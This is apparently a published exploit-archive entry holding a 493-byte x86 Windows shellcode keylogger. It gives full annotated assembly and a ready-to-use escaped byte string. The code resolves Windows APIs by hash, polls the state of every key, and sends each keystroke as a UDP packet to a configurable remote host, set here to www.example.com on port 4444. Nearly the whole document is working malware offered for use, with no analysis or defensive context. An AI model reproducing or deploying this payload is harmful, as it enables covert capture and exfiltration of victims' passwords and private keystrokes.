; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes ; Date: Fri Oct 13 12:58:35 GMT 2016 ; Exploit Author: Fugu ; Vendor Homepage: www.microsoft.com ; Version: all win ; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64) ; Note: it will write to single byte payload udp packets to host. ; keystrokes are written in format: "Virtual-Key Codes", from ; msdn.microsoft.com website section .bss section .data section .text global _start _start: cld ; 00000000 FC call dword loc_88h ; 00000001 E882000000 pushad ; 00000006 60 mov ebp,esp ; 00000007 89E5 xor eax,eax ; 00000009 31C0 mov edx,[fs:eax+0x30] ; 0000000B 648B5030 mov edx,[edx+0xc] ; 0000000F 8B520C mov edx,[edx+0x14] ; 00000012 8B5214 loc_15h: mov esi,[edx+0x28] ; 00000015 8B7228 movzx ecx,word [edx+0x26] ; 00000018 0FB74A26 xor edi,edi ; 0000001C 31FF loc_1eh: lodsb ; 0000001E AC cmp al,0x61 ; 0000001F 3C61 jl loc_25h ; 00000021 7C02 sub al,0x20 ; 00000023 2C20 loc_25h: ror edi,byte 0xd ; 00000025 C1CF0D add edi,eax ; 00000028 01C7 loop loc_1eh ; 0000002A E2F2 push edx ; 0000002C 52 push edi ; 0000002D 57 mov edx,[edx+0x10] ; 0000002E 8B5210 mov ecx,[edx+0x3c] ; 00000031 8B4A3C mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178 jecxz loc_82h ; 00000038 E348 add ecx,edx ; 0000003A 01D1 push ecx ; 0000003C 51 mov ebx,[ecx+0x20] ; 0000003D 8B5920 add ebx,edx ; 00000040 01D3 mov ecx,[ecx+0x18] ; 00000042 8B4918 loc_45h: jecxz loc_81h ; 00000045 E33A dec ecx ; 00000047 49 mov esi,[ebx+ecx*4] ; 00000048 8B348B add esi,edx ; 0000004B 01D6 xor edi,edi ; 0000004D 31FF loc_4fh: lodsb ; 0000004F AC ror edi,byte 0xd ; 00000050 C1CF0D add edi,eax ; 00000053 01C7 cmp al,ah ; 00000055 38E0 jnz loc_4fh ; 00000057 75F6 add edi,[ebp-0x8] ; 00000059 037DF8 cmp edi,[ebp+0x24] ; 0000005C 3B7D24 jnz loc_45h ; 0000005F 75E4 pop eax ; 00000061 58 mov ebx,[eax+0x24] ; 00000062 8B5824 add ebx,edx ; 00000065 01D3 mov cx,[ebx+ecx*2] ; 00000067 668B0C4B mov ebx,[eax+0x1c] ; 0000006B 8B581C add ebx,edx ; 0000006E 01D3 mov eax,[ebx+ecx*4] ; 00000070 8B048B add eax,edx ; 00000073 01D0 mov [esp+0x24],eax ; 00000075 89442424 pop ebx ; 00000079 5B pop ebx ; 0000007A 5B popad ; 0000007B 61 pop ecx ; 0000007C 59 pop edx ; 0000007D 5A push ecx ; 0000007E 51 jmp eax ; 0000007F FFE0 loc_81h: pop edi ; 00000081 5F loc_82h: pop edi ; 00000082 5F pop edx ; 00000083 5A mov edx,[edx] ; 00000084 8B12 jmp short loc_15h ; 00000086 EB8D loc_88h: pop ebp ; 00000088 5D push dword 0x3233 ; 00000089 6833320000 push dword 0x5f327377 ; 0000008E 687773325F push esp ; 00000093 54 push dword 0x726774c ; 00000094 684C772607 call ebp ; 00000099 FFD5 mov eax,0x190 ; 0000009B B890010000 sub esp,eax ; 000000A0 29C4 push esp ; 000000A2 54 push eax ; 000000A3 50 push dword 0x6b8029 ; 000000A4 6829806B00 call ebp ; 000000A9 FFD5 push byte +0x10 ; 000000AB 6A10 jmp dword loc_1ceh ; 000000AD E91C010000 loc_b2h: push dword 0x803428a9 ; 000000B2 68A9283480 call ebp ; 000000B7 FFD5 lea esi,[eax+0x1c] ; 000000B9 8D701C xchg esi,esp ; 000000BC 87F4 pop eax ; 000000BE 58 xchg esp,esi ; 000000BF 87E6 mov esi,eax ; 000000C1 89C6 push dword 0x6c6c ; 000000C3 686C6C0000 push dword 0x642e7472 ; 000000C8 6872742E64 push dword 0x6376736d ; 000000CD 686D737663 push esp ; 000000D2 54 push dword 0x726774c ; 000000D3 684C772607 call ebp ; 000000D8 FFD5 jmp dword loc_1e3h ; 000000DA E904010000 loc_dfh: push dword 0xd1ecd1f ; 000000DF 681FCD1E0D call ebp ; 000000E4 FFD5 xchg ah,al ; 000000E6 86E0 ror eax,byte 0x10 ; 000000E8 C1C810 inc eax ; 000000EB 40 inc eax ; 000000EC 40 push esi ; 000000ED 56 push eax ; 000000EE 50 mov esi,esp ; 000000EF 89E6 xor eax,eax ; 000000F1 31C0 push eax ; 000000F3 50 push eax ; 000000F4 50 push eax ; 000000F5 50 push eax ; 000000F6 50 inc eax ; 000000F7 40 inc eax ; 000000F8 40 push eax ; 000000F9 50 push eax ; 000000FA 50 push dword 0xe0df0fea ; 000000FB 68EA0FDFE0 call ebp ; 00000100 FFD5 mov edi,eax ; 00000102 89C7 loc_104h: push byte +0x10 ; 00000104 6A10 push esi ; 00000106 56 push edi ; 00000107 57 push dword 0x6174a599 ; 00000108 6899A57461 call ebp ; 0000010D FFD5 test eax,eax ; 0000010F 85C0 jz loc_122h ; 00000111 740F dec dword [esi+0x8] ; 00000113 FF4E08 jnz loc_104h ; 00000116 75EC xor eax,eax ; 00000118 31C0 push eax ; 0000011A 50 push dword 0x56a2b5f0 ; 0000011B 68F0B5A256 call ebp ; 00000120 FFD5 loc_122h: push dword 0x3233 ; 00000122 6833320000 push dword 0x72657375 ; 00000127 6875736572 push esp ; 0000012C 54 push dword 0x726774c ; 0000012D 684C772607 call ebp ; 00000132 FFD5 push dword 0x657461 ; 00000134 6861746500 push dword 0x74537965 ; 00000139 6865795374 push dword 0x4b746547 ; 0000013E 684765744B push esp ; 00000143 54 push eax ; 00000144 50 push dword 0x7802f749 ; 00000145 6849F70278 call ebp ; 0000014A FFD5 push esi ; 0000014C 56 push edi ; 0000014D 57 push eax ; 0000014E 50 xor ecx,ecx ; 0000014F 31C9 mov esi,ecx ; 00000151 89CE mov cl,0x8 ; 00000153 B108 loc_155h: push esi ; 00000155 56 loop loc_155h ; 00000156 E2FD loc_158h: xor ecx,ecx ; 00000158 31C9 xor esi,esi ; 0000015A 31F6 push byte +0x8 ; 0000015C 6A08 push dword 0xe035f044 ; 0000015E 6844F035E0 call ebp ; 00000163 FFD5 loc_165h: mov eax,esi ; 00000165 89F0 cmp al,0xff ; 00000167 3CFF jnc loc_158h ; 00000169 73ED inc esi ; 0000016B 46 push esi ; 0000016C 56 call dword [esp+0x24] ; 0000016D FF542424 mov edx,esi ; 00000171 89F2 xor ecx,ecx ; 00000173 31C9 mov cl,0x80 ; 00000175 B180 and eax,ecx ; 00000177 21C8 xor ecx,ecx ; 00000179 31C9 cmp eax,ecx ; 0000017B 39C8 jnz loc_18fh ; 0000017D 7510 xor edx,edx ; 0000017F 31D2 mov ecx,edx ; 00000181 89D1 mov eax,esi ; 00000183 89F0 mov cl,0x20 ; 00000185 B120 div ecx ; 00000187 F7F1 btr [esp+eax*4],edx ; 00000189 0FB31484 jmp short loc_165h ; 0000018D EBD6 loc_18fh: xor edx,edx ; 0000018F 31D2 mov ecx,edx ; 00000191 89D1 mov eax,esi ; 00000193 89F0 mov cl,0x20 ; 00000195 B120 div ecx ; 00000197 F7F1 bt [esp+eax*4],edx ; 00000199 0FA31484 jc loc_165h ; 0000019D 72C6 xor edx,edx ; 0000019F 31D2 mov ecx,edx ; 000001A1 89D1 mov eax,esi ; 000001A3 89F0 mov cl,0x20 ; 000001A5 B120 div ecx ; 000001A7 F7F1 bts [esp+eax*4],edx ; 000001A9 0FAB1484 push esi ; 000001AD 56 push byte +0x10 ; 000001AE 6A10 push dword [esp+0x30] ; 000001B0 FF742430 push byte +0x0 ; 000001B4 6A00 push byte +0x1 ; 000001B6 6A01 lea ecx,[esp+0x10] ; 000001B8 8D4C2410 push ecx ; 000001BC 51 push dword [esp+0x3c] ; 000001BD FF74243C push dword 0xdf5c9d75 ; 000001C1 68759D5CDF call ebp ; 000001C6 FFD5 lea esp,[esp+0x4] ; 000001C8 8D642404 jmp short loc_158h ; 000001CC EB8A loc_1ceh: call dword loc_b2h ; 000001CE E8DFFEFFFF db "www.example.com",0 loc_1e3h: call dword loc_dfh db "4444",0 ;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b" ;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c" ;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" ;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20" ;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac" ;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" ;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" ;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" ;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" ;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00" ;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01" ;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87" ;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73" ;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68" ;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89" ;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0" ;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85" ;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56" ;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77" ;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47" ;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31" ;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44" ;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24" ;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31" ;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31" ;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31" ;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10" ;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24" ;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf" ;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63" ;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"